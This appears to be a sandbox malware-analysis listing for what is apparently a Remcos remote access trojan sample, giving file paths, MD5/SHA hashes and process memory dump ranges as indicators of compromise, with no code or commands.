SHA256 c38e09ab888c21242d8a7eaa4e1a1f378a8beae8f5b362a01595b06487f6a97b
SHA512 cda5c288d26eeade294a979cb3d3509175091539ffa822431d9e8fd5f185caa28aaf0c6de1afa173cabe5864b0b2ffdb122d88555f00f654683cb6fc2788ff66

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 ce31aad931645728cb11543a9cd80f8e
SHA1 3e04faa0eebb25e42df967a276d3ce916947adf9
SHA256 5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06
SHA512 07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7

memory/2412-249-0x0000014E78500000-0x0000014E78522000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ta0tvgc.tjo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2412-254-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/2412-255-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-256-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-257-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-258-0x0000014E7AB50000-0x0000014E7AB76000-memory.dmp

memory/2412-259-0x0000014E7ABB0000-0x0000014E7ABC4000-memory.dmp

memory/540-260-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/540-261-0x0000000002B80000-0x0000000002BB6000-memory.dmp

memory/540-262-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-263-0x0000000005690000-0x0000000005CB8000-memory.dmp

memory/540-264-0x00000000055E0000-0x0000000005602000-memory.dmp

memory/540-265-0x0000000005CC0000-0x0000000005D26000-memory.dmp

memory/540-266-0x0000000005DA0000-0x0000000005E06000-memory.dmp

memory/540-276-0x0000000005E90000-0x00000000061E4000-memory.dmp

memory/540-277-0x00000000064B0000-0x00000000064CE000-memory.dmp

memory/540-278-0x0000000006500000-0x000000000654C000-memory.dmp

memory/540-279-0x0000000005050000-0x0000000005060000-memory.dmp

memory/2412-280-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/540-281-0x0000000007CF0000-0x000000000836A000-memory.dmp

memory/540-282-0x0000000006980000-0x000000000699A000-memory.dmp

memory/2412-283-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/2412-284-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/540-285-0x0000000007760000-0x00000000077F6000-memory.dmp

memory/540-286-0x00000000076F0000-0x0000000007712000-memory.dmp

memory/2412-287-0x0000014E78320000-0x0000014E78330000-memory.dmp

memory/540-288-0x0000000008920000-0x0000000008EC4000-memory.dmp

memory/540-289-0x0000000007680000-0x00000000076A2000-memory.dmp

memory/540-290-0x00000000079A0000-0x00000000079B4000-memory.dmp

memory/540-291-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/540-293-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-294-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

memory/540-295-0x0000000008ED0000-0x000000000CB78000-memory.dmp

memory/540-296-0x0000000005050000-0x0000000005060000-memory.dmp

memory/540-297-0x0000000077051000-0x0000000077171000-memory.dmp

memory/540-298-0x0000000005050000-0x0000000005060000-memory.dmp

memory/5104-299-0x00000000770D8000-0x00000000770D9000-memory.dmp

memory/5104-300-0x0000000077051000-0x0000000077171000-memory.dmp

memory/5104-313-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-314-0x0000000077051000-0x0000000077171000-memory.dmp

C:\ProgramData\Remcos\remcos.exe

MD5 251e51e2fedce8bb82763d39d631ef89
SHA1 677a3566789d4da5459a1ecd01a297c261a133a2
SHA256 2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9
SHA512 3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

memory/5104-366-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-367-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-315-0x00000000024C0000-0x0000000006168000-memory.dmp

memory/5104-368-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/540-369-0x0000000074630000-0x0000000074DE0000-memory.dmp

memory/5104-380-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-383-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-379-0x00000000024C0000-0x0000000006168000-memory.dmp

memory/2412-384-0x00007FFD55010000-0x00007FFD55AD1000-memory.dmp

memory/5104-386-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-387-0x0000000001260000-0x00000000012E2000-memory.dmp

memory/5104-388-0x0000000077051000-0x0000000077171000-memory.dmp

memory/5104-389-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-390-0x0000000001260000-0x00000000024B4000-memory.dmp

memory/5104-391-0x0000000001260000-0x00000000024B4000-memory.dmp